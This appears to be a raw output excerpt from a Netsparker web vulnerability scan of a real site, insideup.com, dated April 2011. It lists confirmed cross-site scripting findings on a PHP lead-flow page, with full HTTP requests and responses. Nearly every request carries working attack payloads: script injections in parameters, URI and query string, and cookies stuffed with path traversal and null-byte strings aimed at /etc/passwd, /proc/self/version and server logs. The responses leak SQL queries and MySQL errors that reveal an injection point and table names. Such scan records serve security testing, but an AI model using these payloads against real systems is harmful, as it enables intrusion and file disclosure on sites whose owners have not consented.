nsextt GET '"--></style></script><script>alert(0x0005C0)</script>

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C0)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=33lfmojg2mv1p3bng64cuc3ae3; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005C0)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C0)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E

/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C2)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005C2)</script>

Request

GET /ppc/leadflow/inco00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C2)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=cbogjid19r0l255t1l2c6mn482; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php'"--></style></script><script>netsparker(0x0005C2)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C2)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?'"--></style></script><script>alert(0x0005C4..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005C4)</script>

Request

GET /ppc/leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jocr1j8f36k0035jc3eh84kos3; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 